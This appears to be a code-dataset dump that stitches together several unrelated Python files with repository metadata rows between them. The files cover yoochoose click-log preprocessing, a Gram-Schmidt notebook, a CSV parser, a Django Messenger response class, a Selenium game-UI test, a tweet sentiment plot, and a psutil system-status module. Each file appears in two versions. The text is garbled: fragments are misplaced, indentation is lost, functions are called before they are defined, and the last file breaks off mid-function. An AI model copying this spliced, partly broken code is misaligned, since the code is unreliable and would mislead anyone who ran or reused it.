if not os.path.exists(DATA_DIR):
os.makedirs(DATA_DIR)
| 35.873016 | 130 | 0.516814 | import numpy as np
import pandas as pd
import gzip
import sys
from collections import Counter
import os
# All input/output files of this script live under this directory,
# relative to the src/ working directory.
DATA_DIR = "../data/"
# exist_ok=True avoids the check-then-create race of the previous
# `if not os.path.exists(...): os.makedirs(...)` pattern.
os.makedirs(DATA_DIR, exist_ok=True)
def process_yoochoose():
    """Convert the raw yoochoose click/buy logs into chainRec's input format.

    Reads ``DATA_DIR/yoochoose-buys.dat`` and ``yoochoose-clicks.dat``, keeps
    only sessions that have at least one purchase, encodes each (session,
    item) interaction as 1 (bought) or 0 (clicked only), drops items with
    fewer than 5 interactions, remaps session/item ids to dense integers
    (assigned in encounter order), and writes:
      * ``yoochoose.user_item_map.gz`` -- one dict-literal line per session
      * ``yoochoose_user_names.csv`` / ``yoochoose_item_names.csv`` -- the
        original-id -> dense-id mappings
    (Only change from the previous revision besides documentation: stripped
    trailing extraction garbage that had been fused onto the last line.)
    """
    print("loading yoochoose data ... ")
    sys.stdout.flush()
    data_buy = pd.read_csv(DATA_DIR+"yoochoose-buys.dat", header=None)
    data_buy.columns = ['session_id', 'ts', 'item_id', 'category', 'Qty']
    # session_id -> {item_id: 1} for every purchased item.
    data = dict([(k, dict(zip(v.values, np.ones(len(v)).astype(int)))) for (k, v) in data_buy.groupby(['session_id'])['item_id']])
    # Merge clicks: clicked-but-not-bought items get level 0.  Sessions with
    # no purchase at all are dropped (only existing keys are updated).
    with open(DATA_DIR+"yoochoose-clicks.dat") as fin:
        for l in fin:
            sid, _, iid, _ = l.strip().split(",")
            sid = int(sid)
            iid = int(iid)
            if sid in data:
                dout = data[sid]
                if iid not in dout:
                    dout[iid] = 0
                data[sid] = dout
    # Keep only items with at least 5 interactions overall.
    item_count = np.array(list(Counter([i for u in data for i in data[u]]).items()))
    user_map = {}
    item_set = set(list(item_count[item_count[:,1].astype(float)>=5,0]))
    item_map = {}
    print("preprocessing and dumping data ... ")
    sys.stdout.flush()
    with gzip.open(DATA_DIR+"yoochoose.user_item_map.gz", "w") as fdata:
        for uid_str in data:
            d0 = data[uid_str]
            d = {}
            # Re-index surviving items with dense ids, assigned on first sight.
            for di in d0:
                if di in item_set:
                    iid = len(item_map)
                    if di in item_map:
                        iid = item_map[di]
                    else:
                        item_map[di] = iid
                    d[iid] = d0[di]
            # Only dump sessions that still have at least one surviving item;
            # those sessions get dense user ids in encounter order.
            if len(d)>0:
                dout = {}
                uid = len(user_map)
                if uid_str in user_map:
                    uid = user_map[uid_str]
                else:
                    user_map[uid_str] = uid
                dout['user_id'] = uid
                dout['items'] = d
                fdata.write((str(dout)+"\n").encode("utf-8"))
    # Persist the original-id -> dense-id mappings for later reference.
    np.savetxt(DATA_DIR+"yoochoose_user_names.csv", np.array(list(user_map.items())), fmt="%s", delimiter=",")
    np.savetxt(DATA_DIR+"yoochoose_item_names.csv", np.array(list(item_map.items())), fmt="%s", delimiter=",")
    print("done!")
    sys.stdout.flush()
b48167b67139ec28d4ec463e0cfd1adfa33938a1 | 1,307 | py | Python | multyqubit.py | kaitodeesu/project2021 | 1b6a850f7c7aaced7173e424c0eca21e8349f071 | [
"MIT"
] | null | null | null | multyqubit.py | kaitodeesu/project2021 | 1b6a850f7c7aaced7173e424c0eca21e8349f071 | [
"MIT"
] | null | null | null | multyqubit.py | kaitodeesu/project2021 | 1b6a850f7c7aaced7173e424c0eca21e8349f071 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
# In[17]:
import numpy as np
from numpy import linalg as LA
dimension=2 #次元を指定する
v=randomnumber(dimension)
e=np.zeros((dimension,dimension),dtype='float64')#エルミット演算子を生成する単位ベクトル
u=getu(dimension)
print(u)
for c in range(0,dimension):
e[c]=u[c]/LA.norm(u[c],2)#·ord=2
print(e)
# In[18]:
#psi=np.random.random((dimension))
#psi=e[0]
psi=np.array([e[0]])
print(psi)
print(LA.norm(psi,2)) #ノルム確認
# In[19]:
np.dot(np.dot(psi,e),psi.T)
# In[27]:
f=0
for a in range(0,10000):
u=getu(dimension)
for c in range(0,dimension):
e[c]=u[c]/LA.norm(u[c],2)#·ord=2
psi=psi=np.array([e[0]])
d=np.dot(np.dot(psi,e),psi.T)
if(d>=0):
f=f+1
print(f)
# # 多量子ビット系
# In[28]:
for a in range(0,2):
# In[ ]:
| 13.904255 | 69 | 0.589135 | #!/usr/bin/env python
# coding: utf-8
# In[17]:
import numpy as np
from numpy import linalg as LA
dimension=2 #次元を指定する
def randomnumber(dimension):
    """Return a (dimension x dimension) matrix of uniform [0, 1) samples."""
    shape = (dimension, dimension)
    return np.random.random(shape)
def gram(a, b):
    """Projection of vector b onto vector a (Gram-Schmidt building block)."""
    coeff = np.dot(a, b) / np.dot(a, a)
    return coeff * a
def hermatite(a):
    """Conjugate transpose (Hermitian adjoint) of matrix ``a``."""
    transposed = a.T
    return np.conjugate(transposed)
v=randomnumber(dimension)
e=np.zeros((dimension,dimension),dtype='float64')#エルミット演算子を生成する単位ベクトル
def getu(dimension, vectors=None):
    """Gram-Schmidt orthogonalization (without normalization).

    Builds ``dimension`` mutually orthogonal row vectors from the rows of
    ``vectors``; ``vectors`` defaults to the module-level random matrix
    ``v`` for backward compatibility with the original call sites.

    Fixes two defects of the previous version:
    * the projection accumulator was never reset between rows, so every row
      after the second subtracted stale projections from earlier rows;
    * the accumulator was hard-coded to length 2 (``np.array([0, 0])``),
      which broke for dimension != 2.
    It also no longer shadows the builtin ``sum``.
    """
    if vectors is None:
        vectors = v  # module-level random basis (original behaviour)
    u = np.zeros((dimension, dimension), dtype='float64')  # orthogonal rows
    u[0] = vectors[0]
    for a in range(1, dimension):
        # Sum of projections of vectors[a] onto all previously built rows,
        # reset for every row.
        proj = np.zeros(dimension, dtype='float64')
        for b in range(0, a):
            proj += (np.dot(u[b], vectors[a]) / np.dot(u[b], u[b])) * u[b]
        u[a] = vectors[a] - proj
    return u
u=getu(dimension)
print(u)
for c in range(0,dimension):
e[c]=u[c]/LA.norm(u[c],2)#·ord=2
print(e)
# In[18]:
#psi=np.random.random((dimension))
#psi=e[0]
psi=np.array([e[0]])
print(psi)
print(LA.norm(psi,2)) #ノルム確認
# In[19]:
np.dot(np.dot(psi,e),psi.T)
# In[27]:
f=0
for a in range(0,10000):
u=getu(dimension)
for c in range(0,dimension):
e[c]=u[c]/LA.norm(u[c],2)#·ord=2
psi=psi=np.array([e[0]])
d=np.dot(np.dot(psi,e),psi.T)
if(d>=0):
f=f+1
print(f)
# # 多量子ビット系
# In[28]:
for a in range(0,2):
# In[ ]:
| 458 | 0 | 92 |
4eba4d82b6df63e6d64913d575575baca285af09 | 865 | py | Python | datautil.py | zadiran/DataworksOnline | be8e9c207dd6cbe84e4c8afdf956e9360f905320 | [
"MIT"
] | null | null | null | datautil.py | zadiran/DataworksOnline | be8e9c207dd6cbe84e4c8afdf956e9360f905320 | [
"MIT"
] | null | null | null | datautil.py | zadiran/DataworksOnline | be8e9c207dd6cbe84e4c8afdf956e9360f905320 | [
"MIT"
] | null | null | null | import json
import io
| 22.179487 | 73 | 0.647399 | import json
import io
def read_file(filename):
    """Read a text file and return its lines with surrounding whitespace
    (including the trailing newline) stripped."""
    with open(filename) as fh:
        return [ln.strip() for ln in fh]
def get_columns(lines, delimiter):
    """Split the header (first line) into a list of column names."""
    header = lines[0]
    return header.split(delimiter)
def get_data(lines, delimiter):
    """Split every non-header line into a row of field strings.

    Fix: the previous implementation skipped the header with a bare
    ``next(iterator)``, which raised StopIteration for empty input; slicing
    handles the empty (and header-only) cases gracefully, returning [].
    """
    return [line.split(delimiter) for line in lines[1:]]
def read_bytes(byte_arr):
    """Decode raw bytes as UTF-8 and return the list of lines."""
    raw_lines = io.BytesIO(byte_arr).read().splitlines()
    return [chunk.decode('utf-8') for chunk in raw_lines]
def get_parsed_file(byte_arr, delimiter):
    """Parse delimited bytes into column names, data rows, and a JSON copy
    of the rows (under 'columns', 'data' and 'data_json')."""
    lines = read_bytes(byte_arr)
    parsed = {
        'columns': get_columns(lines, delimiter),
        'data': get_data(lines, delimiter),
    }
    parsed['data_json'] = json.dumps(parsed['data'])
    return parsed
| 727 | 0 | 115 |
1259747036f2db45257e6dc9bb60b6e03de0137a | 4,759 | py | Python | messenger/utils/response/response.py | functioncall/rescue-habit | 98c9d3f2feff0ed100523f9822865a139f6f7648 | [
"MIT"
] | null | null | null | messenger/utils/response/response.py | functioncall/rescue-habit | 98c9d3f2feff0ed100523f9822865a139f6f7648 | [
"MIT"
] | null | null | null | messenger/utils/response/response.py | functioncall/rescue-habit | 98c9d3f2feff0ed100523f9822865a139f6f7648 | [
"MIT"
] | null | null | null | import json
import os
import random
import requests
from django_project import settings
from django.http import HttpResponse, JsonResponse
from messenger.utils.response.ResponseTypes.QuickReplyResponse import QuickReplyResponse
from messenger.utils.response.ResponseTypes.TextResponse import TextResponse
from django.conf import settings
def value_validator(variables, values):
"""
1. Checks if "values" is of type <dict>
2. Checks if all variables are present in the values <dict>
:param variables: <list>
:param values: <dict>
:raise: InvalidTemplateValues, IncompleteTemplateValues
:return None
"""
return None
# if type(values) is not dict:
# raise InvalidTemplateValues(values)
# elif set(variables) != set(dict.keys(values)):
# raise IncompleteTemplateValues([v for v in variables if v not in values])
class Response(object):
"""
Response class for chat data and text templating.
"""
def __init__(self, data, page_access_token=None):
"""
:param data: message data
"""
self.params = {"access_token": page_access_token}
self.headers = {"Content-Type": "application/json"}
self.data = {"recipient": {"id": None}, "message": {}}
self.text = TextResponse(data["text"]) \
if "text" in data else None
self.quick_replies = QuickReplyResponse(data["quick_replies"]) \
if "quick_replies" in data else None
self.attachments = data.get("attachments", {})
def add_recipient_id(self, recipient_id):
"""
Adds the chat receivers id to instance
:param recipient_id: facebook_id of a chat participant
"""
self.data["recipient"]["id"] = recipient_id
def send_to(self, recipient_id, page_access_token, node_name):
"""
Orders messages before sending
:param recipient_id: facebook_id of a chat participant
"""
self.params = {"access_token": page_access_token}
self.add_recipient_id(recipient_id)
r = None
if self.quick_replies and self.text: # If quick_replies and text
r = self.send(self.data["message"], ["quick_replies", "text"], recipient_id) # are both present send both
elif self.text:
# send text if quick_replies
r = self.send(self.data["message"], ["text"], recipient_id) # are not present
if self.attachments: # Send attachments alone
r = self.send(self.data["message"], ["attachment"], recipient_id)
# always, in compatible with
# text and quick_replies
self.data['intent'] = node_name
return JsonResponse(self.data)
def extract_message(self, text_response_data=None, quick_reply_response_data=None, attachment_response_data=None):
"""
Evaluate template strings in text/quick_replies/attachments and convert them to a value.
:param text_response_data:
:param quick_reply_response_data:
:param attachment_response_data:
:rtype: Response
"""
if self.text:
self.data["message"]["text"] = self.text.eval(text_response_data)
if self.quick_replies:
self.data["message"]["quick_replies"] = self.quick_replies.eval(quick_reply_response_data)
if self.attachments:
if attachment_response_data:
stringified_attachments = json.dumps(self.attachments)
for item in attachment_response_data:
stringified_attachments = stringified_attachments.replace('{}', str(item), 1)
self.attachments = json.loads(stringified_attachments)
print('*' * 100)
self.data["message"]["attachment"] = self.attachments
return self
def send(self, message, types, recipient_id):
"""
HTTP Request to facebook endpoint to send messages
:param message:
:param types:
:param recipient_id:
:return:
"""
data = {
"recipient": {
"id": recipient_id
},
"message": {
type: message[type] for type in types
}
}
if self.params.get('access_token'):
# r = requests.post(
# "https://graph.facebook.com/v4.0/me/messages",
# params=self.params,
# headers=self.headers,
# data=json.dumps(data)
# )
# print(r.text)
return JsonResponse(data, status=200)
else:
return JsonResponse({}, status=200)
| 34.737226 | 120 | 0.602858 | import json
import os
import random
import requests
from django_project import settings
from django.http import HttpResponse, JsonResponse
from messenger.utils.response.ResponseTypes.QuickReplyResponse import QuickReplyResponse
from messenger.utils.response.ResponseTypes.TextResponse import TextResponse
from django.conf import settings
def value_validator(variables, values):
    """
    1. Checks if "values" is of type <dict>
    2. Checks if all variables are present in the values <dict>
    :param variables: <list>
    :param values: <dict>
    :raise: InvalidTemplateValues, IncompleteTemplateValues
    :return None
    """
    # NOTE(review): validation is currently a no-op -- the checks below are
    # commented out, so the documented exceptions are never raised.  Confirm
    # whether template validation should be re-enabled before relying on it.
    return None
    # if type(values) is not dict:
    #     raise InvalidTemplateValues(values)
    # elif set(variables) != set(dict.keys(values)):
    #     raise IncompleteTemplateValues([v for v in variables if v not in values])
class Response(object):
    """
    Builds a Messenger-style chat response (text, quick replies and/or
    attachments) from raw template data and renders it as the Facebook
    Send-API payload shape {"recipient": ..., "message": ...}.

    NOTE: the actual HTTP POST to the Facebook Graph API is commented out
    in send(); the class currently only echoes the payload back as a
    Django JsonResponse.
    """
    def __init__(self, data, page_access_token=None):
        """
        :param data: message data; recognized keys are "text",
            "quick_replies" and "attachments"
        :param page_access_token: Facebook page token kept in request params
        """
        self.params = {"access_token": page_access_token}
        self.headers = {"Content-Type": "application/json"}
        # Send-API payload skeleton; the recipient id is filled in later.
        self.data = {"recipient": {"id": None}, "message": {}}
        self.text = TextResponse(data["text"]) \
            if "text" in data else None
        self.quick_replies = QuickReplyResponse(data["quick_replies"]) \
            if "quick_replies" in data else None
        self.attachments = data.get("attachments", {})
    def add_recipient_id(self, recipient_id):
        """
        Adds the chat receiver's id to the pending payload.
        :param recipient_id: facebook_id of a chat participant
        """
        self.data["recipient"]["id"] = recipient_id
    def send_to(self, recipient_id, page_access_token, node_name):
        """
        Orders and dispatches the message parts, then returns the payload.
        :param recipient_id: facebook_id of a chat participant
        :param page_access_token: token used for the (disabled) Graph API call
        :param node_name: conversation node recorded as the payload "intent"
        """
        self.params = {"access_token": page_access_token}
        self.add_recipient_id(recipient_id)
        r = None  # NOTE(review): assigned but never read afterwards
        if self.quick_replies and self.text:  # If quick_replies and text
            r = self.send(self.data["message"], ["quick_replies", "text"], recipient_id)  # are both present send both
        elif self.text:
            # send text if quick_replies
            r = self.send(self.data["message"], ["text"], recipient_id)  # are not present
        if self.attachments:  # Send attachments alone
            r = self.send(self.data["message"], ["attachment"], recipient_id)
            # always, in compatible with
            # text and quick_replies
        self.data['intent'] = node_name
        return JsonResponse(self.data)
    def extract_message(self, text_response_data=None, quick_reply_response_data=None, attachment_response_data=None):
        """
        Evaluate template strings in text/quick_replies/attachments and convert them to a value.
        Attachment templating replaces each literal "{}" placeholder in the
        JSON-serialized attachments with the next item, left to right.
        :param text_response_data: values for the text template
        :param quick_reply_response_data: values for the quick-reply template
        :param attachment_response_data: iterable of positional "{}" fillers
        :rtype: Response
        """
        if self.text:
            self.data["message"]["text"] = self.text.eval(text_response_data)
        if self.quick_replies:
            self.data["message"]["quick_replies"] = self.quick_replies.eval(quick_reply_response_data)
        if self.attachments:
            if attachment_response_data:
                stringified_attachments = json.dumps(self.attachments)
                for item in attachment_response_data:
                    # one "{}" placeholder is replaced per item (count=1)
                    stringified_attachments = stringified_attachments.replace('{}', str(item), 1)
                self.attachments = json.loads(stringified_attachments)
                print('*' * 100)  # NOTE(review): leftover debug output
            self.data["message"]["attachment"] = self.attachments
        return self
    def send(self, message, types, recipient_id):
        """
        Build the Send-API request body for the selected message parts.
        The HTTP request to the Facebook endpoint is commented out below, so
        this currently returns the body as a JsonResponse (or an empty one
        when no access token is configured).
        :param message: the assembled message dict
        :param types: keys of ``message`` to include (e.g. ["text"])
        :param recipient_id: facebook_id of the receiving participant
        :return: django.http.JsonResponse with status 200
        """
        data = {
            "recipient": {
                "id": recipient_id
            },
            "message": {
                # NOTE(review): `type` shadows the builtin here; harmless
                # because it is scoped to the comprehension.
                type: message[type] for type in types
            }
        }
        if self.params.get('access_token'):
            # r = requests.post(
            #     "https://graph.facebook.com/v4.0/me/messages",
            #     params=self.params,
            #     headers=self.headers,
            #     data=json.dumps(data)
            # )
            # print(r.text)
            return JsonResponse(data, status=200)
        else:
            return JsonResponse({}, status=200)
| 0 | 0 | 0 |
2802007a914ccea0529db32e456238e601b7bb66 | 4,238 | py | Python | tests/test_web_ui.py | underground-lab/zelezobeton | 5afd96c3123b3d8accca107c6e60a3f6fdecdf27 | [
"MIT"
] | 2 | 2022-01-10T11:46:46.000Z | 2022-01-11T08:32:54.000Z | tests/test_web_ui.py | underground-lab/zelezobeton | 5afd96c3123b3d8accca107c6e60a3f6fdecdf27 | [
"MIT"
] | 1 | 2022-01-13T09:16:25.000Z | 2022-01-14T08:39:12.000Z | tests/test_web_ui.py | underground-lab/zelezobeton | 5afd96c3123b3d8accca107c6e60a3f6fdecdf27 | [
"MIT"
] | null | null | null | # coding: utf-8
import os
from urllib.request import urlopen
import pytest
from selenium.webdriver import Firefox, ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.support.expected_conditions import staleness_of
from selenium.webdriver.support.wait import WebDriverWait
# Base URL of the locally running app under test.
URL = 'http://localhost:8000/'
# Run the browser headless unless NO_HEADLESS is set in the environment.
HEADLESS = not os.getenv('NO_HEADLESS')
# Probe the server once at import time; tests are skipped when it is down.
try:
    with urlopen(URL):
        SERVER_RUNNING = True
except OSError:
    SERVER_RUNNING = False
@pytest.fixture
@pytest.mark.skipif(not SERVER_RUNNING, reason='requires local server running')
| 37.175439 | 85 | 0.717084 | # coding: utf-8
import os
from urllib.request import urlopen
import pytest
from selenium.webdriver import Firefox, ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.support.expected_conditions import staleness_of
from selenium.webdriver.support.wait import WebDriverWait
# Base URL of the locally running app under test.
URL = 'http://localhost:8000/'
# Run the browser headless unless NO_HEADLESS is set in the environment.
HEADLESS = not os.getenv('NO_HEADLESS')
# Probe the server once at import time; tests are skipped when it is down.
try:
    with urlopen(URL):
        SERVER_RUNNING = True
except OSError:
    SERVER_RUNNING = False
@pytest.fixture
def driver():
    """Yield a Firefox driver pointed at the app; quit it on teardown."""
    firefox_options = Options()
    firefox_options.headless = HEADLESS
    browser = Firefox(options=firefox_options)
    browser.implicitly_wait(5)
    browser.get(URL)
    yield browser
    browser.quit()  # teardown
@pytest.mark.skipif(not SERVER_RUNNING, reason='requires local server running')
def test_web_ui(driver):
    """End-to-end browser walkthrough of the game UI: start a new game,
    pick up items, leave and continue, then restart and verify the
    inventory was reset. Assertions match the Czech page texts."""
    def perform_and_wait(action, obj):
        """Click the `<action>_<obj>` button inside the `<action>` dropdown
        and wait until the room description element is re-rendered."""
        dropdown = driver.find_element(By.ID, f'{action}_dropdown')
        button = driver.find_element(By.ID, f'{action}_{obj}_button')
        # Staleness of the current room description signals the page update
        # triggered by the click.
        condition = staleness_of(driver.find_element(By.ID, 'room_description'))
        actions = ActionChains(driver).move_to_element(dropdown).click(button)
        wait = WebDriverWait(driver, 5)
        actions.perform()
        wait.until(condition)
    # start a new game
    driver.find_element(By.ID, 'new_game').click()
    assert 'Chodba' in driver.find_element(By.ID, 'room_description').text
    assert driver.find_element(By.ID, 'open_dropdown')
    assert 'dveře' in driver.find_element(By.ID, 'in_room').text
    assert 'minci' in driver.find_element(By.ID, 'in_inventory').text
    perform_and_wait('go', 'north')
    assert 'Kancelář' in driver.find_element(By.ID, 'room_description').text
    assert 'plechovku' in driver.find_element(By.ID, 'in_room').text
    assert driver.find_element(By.ID, 'open_dropdown')
    perform_and_wait('open', 'plechovka')
    assert 'jen dvě kancelářské sponky' in driver.find_element(By.ID, 'message').text
    assert 'sponky' in driver.find_element(By.ID, 'in_room').text
    perform_and_wait('take', 'sponky')
    assert 'OK' in driver.find_element(By.ID, 'message').text
    assert 'sponky' in driver.find_element(By.ID, 'in_inventory').text
    assert driver.find_element(By.ID, 'use_dropdown')
    # go to homepage
    driver.find_element(By.ID, 'home').click()
    # continue game
    driver.find_element(By.ID, 'continue_game').click()
    assert 'Kancelář' in driver.find_element(By.ID, 'room_description').text
    assert 'sponky' in driver.find_element(By.ID, 'in_inventory').text
    perform_and_wait('go', 'south')
    assert 'Chodba' in driver.find_element(By.ID, 'room_description').text
    perform_and_wait('open', 'dvere')
    assert 'OK' in driver.find_element(By.ID, 'message').text
    perform_and_wait('go', 'east')
    assert 'Sklad' in driver.find_element(By.ID, 'room_description').text
    assert 'smeták' in driver.find_element(By.ID, 'in_room').text
    perform_and_wait('take', 'smetak')
    assert 'OK' in driver.find_element(By.ID, 'message').text
    assert 'smeták' in driver.find_element(By.ID, 'in_inventory').text
    # go to homepage
    driver.find_element(By.ID, 'home').click()
    # start a new game
    driver.find_element(By.ID, 'new_game').click()
    assert 'Chodba' in driver.find_element(By.ID, 'room_description').text
    assert driver.find_element(By.ID, 'open_dropdown')
    assert 'sponky' not in driver.find_element(By.ID, 'in_inventory').text
    assert 'smeták' not in driver.find_element(By.ID, 'in_inventory').text
    perform_and_wait('open', 'dvere')
    assert 'OK' in driver.find_element(By.ID, 'message').text
    perform_and_wait('go', 'east')
    assert 'Sklad' in driver.find_element(By.ID, 'room_description').text
    assert 'smeták' in driver.find_element(By.ID, 'in_room').text
    assert 'krabici hřebíků' in driver.find_element(By.ID, 'in_room').text
    perform_and_wait('take', 'krabice')
    assert 'Jeden bude stačit' in driver.find_element(By.ID, 'message').text
    assert 'krabici hřebíků' in driver.find_element(By.ID, 'in_room').text
    assert 'hřebík' in driver.find_element(By.ID, 'in_inventory').text
| 3,584 | 0 | 44 |
6e64305e1e82509bdea2615d39ca0bdc7b96d09d | 1,653 | py | Python | new_date_extract.py | Arwain/Undergraduate-Research---Twitter-Sentiment-Analysis | 32429604b18ec8c96473836b1cf36bddfad2fe4e | [
"MIT"
] | null | null | null | new_date_extract.py | Arwain/Undergraduate-Research---Twitter-Sentiment-Analysis | 32429604b18ec8c96473836b1cf36bddfad2fe4e | [
"MIT"
] | null | null | null | new_date_extract.py | Arwain/Undergraduate-Research---Twitter-Sentiment-Analysis | 32429604b18ec8c96473836b1cf36bddfad2fe4e | [
"MIT"
] | null | null | null |
# Loads tweet sentiment data, converts each tweet's DATE string into a
# "time since tweet" delta, and plots tweet age (hours) vs. compound score.
import pandas as pd
from sklearn.cluster import KMeans
import numpy as np
import matplotlib.pyplot as plt
from datetime import datetime, date, time, timedelta
import re
import pickle
import time as tm
df = pd.read_csv("bitcoin_auto.csv", dtype={"COMPOUND": float})
df = df.drop_duplicates()
# print(df.head())
df.info()
# tm.sleep(120)
# Handle missing data
# df['COMPOUND'] = df['COMPOUND'].fillna(0)
# today_date = datetime.today()
# event_date = datetime(2018, 4, 13, 21, 0, 0) # Date of Syria bombing announcement
# event_date = datetime(2018, 6, 12, 12, 0, 0) # Date of Korean Summit
# print(event_date)
temp_list = []
for index, row in df.iterrows():
    # Slice weekday-less "Mon DD HH:MM:SS" plus the trailing year out of DATE.
    f_date = row['DATE'][4:20]
    year = row['DATE'][26:]
    f_date = f_date + year
    # print(f_date)
    # Keep only letters/digits so strptime can parse '%b%d%H%M%S%Y'.
    regex = re.findall(r"[a-zA-Z]|\d", f_date)
    f_date = "".join(regex)
    datetime_object = datetime.strptime(f_date, '%b%d%H%M%S%Y')
    # print(datetime_object)
    # NOTE(review): `today_date` is only defined in a commented-out line
    # above, so this raises NameError as written -- restore that assignment.
    t = today_date - datetime_object
    # print(t)
    temp_list.append(t)
df['T_minus'] = temp_list
f1 = []
f2 = []
for index, row in df.iterrows():
    # NOTE(review): this local `time` shadows datetime.time imported above.
    time = (row['T_minus'].days * 24) + (row['T_minus'].seconds/3600)
    # time = row['T_minus'].seconds
    f1.append(time)
    print(time)
    f2.append(row['COMPOUND'])
    # print(row['COMPOUND'])
# print(len(f1))
# print(len(f2))
# Pickle arrays
# NOTE(review): these handles are never closed; prefer `with open(...)`.
f1_file = open('btc_hours_f1.pkl', 'wb')
f2_file = open('btc_hours_f2.pkl', 'wb')
pickle.dump(f1, f1_file)
pickle.dump(f2, f2_file)
# Plot Data
plt.xlabel('Time(hours)')
plt.ylabel('Compound sentiment score')
plt.scatter(f1, f2, c='black', s=1)
plt.show()
| 24.671642 | 85 | 0.640653 |
# Loads tweet sentiment data, converts each tweet's DATE string into a
# "time since tweet" delta, and plots tweet age (hours) vs. compound score.
import pandas as pd
from sklearn.cluster import KMeans
import numpy as np
import matplotlib.pyplot as plt
from datetime import datetime, date, time, timedelta
import re
import pickle
import time as tm
df = pd.read_csv("bitcoin_auto.csv", dtype={"COMPOUND": float})
df = df.drop_duplicates()
# print(df.head())
df.info()
# tm.sleep(120)
# Handle missing data
# df['COMPOUND'] = df['COMPOUND'].fillna(0)
# Reference point for the T_minus calculation.  Fix: this assignment was
# commented out while still being used below, which raised a NameError.
today_date = datetime.today()
# event_date = datetime(2018, 4, 13, 21, 0, 0) # Date of Syria bombing announcement
# event_date = datetime(2018, 6, 12, 12, 0, 0) # Date of Korean Summit
# print(event_date)
# Parse each raw DATE string into a datetime and store the timedelta back
# to `today_date` (the weekday prefix and timezone offset are sliced away).
temp_list = []
for index, row in df.iterrows():
    f_date = row['DATE'][4:20]
    year = row['DATE'][26:]
    f_date = f_date + year
    # Keep only letters/digits so strptime can parse '%b%d%H%M%S%Y'.
    regex = re.findall(r"[a-zA-Z]|\d", f_date)
    f_date = "".join(regex)
    datetime_object = datetime.strptime(f_date, '%b%d%H%M%S%Y')
    temp_list.append(today_date - datetime_object)
df['T_minus'] = temp_list
# Feature vectors: f1 = age of tweet in hours, f2 = compound sentiment.
f1 = []
f2 = []
for index, row in df.iterrows():
    # `hours` instead of `time` to avoid shadowing datetime.time.
    hours = (row['T_minus'].days * 24) + (row['T_minus'].seconds/3600)
    # hours = row['T_minus'].seconds
    f1.append(hours)
    print(hours)
    f2.append(row['COMPOUND'])
# Pickle arrays (context managers ensure the files are flushed and closed;
# the original left both handles open).
with open('btc_hours_f1.pkl', 'wb') as f1_file:
    pickle.dump(f1, f1_file)
with open('btc_hours_f2.pkl', 'wb') as f2_file:
    pickle.dump(f2, f2_file)
# Plot Data
plt.xlabel('Time(hours)')
plt.ylabel('Compound sentiment score')
plt.scatter(f1, f2, c='black', s=1)
plt.show()
| 0 | 0 | 0 |
2c6a9976f7657424840a5d3cbdfa941b9489f0c1 | 3,523 | py | Python | modules/status.py | NightKey/Server-monitoring-discord-bot | 69444953e2c7abd957cbfe7f0e3943f6fbf4b6b4 | [
"Unlicense"
] | 2 | 2020-02-24T02:15:30.000Z | 2022-03-30T05:26:18.000Z | modules/status.py | NightKey/Server-monitoring-discord-bot | 69444953e2c7abd957cbfe7f0e3943f6fbf4b6b4 | [
"Unlicense"
] | null | null | null | modules/status.py | NightKey/Server-monitoring-discord-bot | 69444953e2c7abd957cbfe7f0e3943f6fbf4b6b4 | [
"Unlicense"
] | null | null | null | from typing import Collection, Dict, Union
from modules import bar
from datetime import timedelta
import psutil
valid_fstypes = ["ntfs", "ext4", "ext3"]
def get_pc_status() -> "tuple[dict, dict, dict]":
    """With the help of the psutil module, scans the PC for information about all the drives, the memory and the battery, if it has one.
    Returns (disks, memory, battery) as a 3-tuple, in this order.
    """
    # Per-mountpoint disk usage dicts (helper defined elsewhere in this module).
    disks = get_disk_status()
    # RAM and swap usage snapshots from psutil, as plain dicts.
    memory = {"RAM":psutil.virtual_memory()._asdict(), "SWAP": psutil.swap_memory()._asdict()}
    # Battery reading, or None when no battery is available.
    battery = get_battery_status()
    return disks, memory, battery
def get_graphical(bar_size, in_dict=False) -> Union[str, Dict[str, str]]:
    """Using the bar module, creates a visual representation of the system's status.
    It shows each disk's and the memory's percentage, the used and the total space, and the battery's remaining lifetime, whether it's plugged in, and the battery's percentage.

    :param bar_size: width of the rendered bars, in characters
    :param in_dict: when True, return {section: [values..., bar]} instead of one string
    """
    disks, memory, battery = get_pc_status()
    bars = bar.loading_bar("", 100, size=bar_size, show="▓", off_show="░")
    if battery != None:
        bars.update(round(battery["percent"], 1), False)
        battery["bar"] = bars.bar()
    if in_dict:
        d = {}
    else:
        string = ""
    # One section per monitored disk: total, used and a percentage bar.
    for mp, disk in disks.items():
        bars.update(round(disk["percent"], 1), False)
        dbar = bars.bar()
        # Convert byte counts to GiB for display.
        tmp = round(int(disk["total"]) / (1024 **3), 2)
        total = f"{tmp} GiB"
        tmp = round(int(disk["used"]) / (1024 **3), 2)
        used = f"{tmp} GiB"
        if in_dict:
            d[f"{mp.upper()}"]=[total, used, dbar]
        else:
            string += f"{mp}: Max: {total}, used: {used}\n{dbar}\n"
    for key in ["RAM", "SWAP"]:
        tmp = round(int(memory[key]["used"]) / (1024 **3), 2)
        used = f"{tmp} GiB"
        tmp = round(int(memory[key]["total"]) / (1024 **3), 2)
        _max = f"{tmp} GiB"
        bars.update(round(memory[key]["percent"], 1), False)
        _bar = bars.bar()
        if in_dict:
            d[key]=[_max, used, _bar]
        else:
            # NOTE(review): this label says "RAM" even on the SWAP pass.
            string += f"Max RAM memory: {_max} / Used memory: {used}\n{_bar}\n"
    if battery == None:
        if in_dict:
            d['Battery']=["Not detected"]
        else:
            string += "Battery not detected!"
    else:
        # Empty string when plugged in, "not " otherwise.
        tmp = "" if battery["power_plugged"] else "not "
        if in_dict:
            d["Battery"]=[timedelta(seconds=battery['secsleft']), f"The power is {tmp}plugged in", battery['bar']]
        else:
            string += f"Remaining battery life: {timedelta(seconds=battery['secsleft'])} and it's {tmp}plugged in.\nBattery status:\n {battery['bar']}"
    if in_dict:
        return d
    else:
        return string
# Demo entry point: render the status report with 25-character bars.
if __name__ == "__main__" :
    print(get_graphical(25))
| 37.478723 | 165 | 0.599773 | from typing import Collection, Dict, Union
from modules import bar
from datetime import timedelta
import psutil
valid_fstypes = ["ntfs", "ext4", "ext3"]
def get_temp() -> Union[float, None]:
    """Return the current CPU core temperature, or None when unavailable.

    Returns None when the platform does not implement
    sensors_temperatures(), reports no sensors at all, or has no
    "coretemp" readings (the key is driver-specific and missing e.g. on
    Windows/macOS).
    """
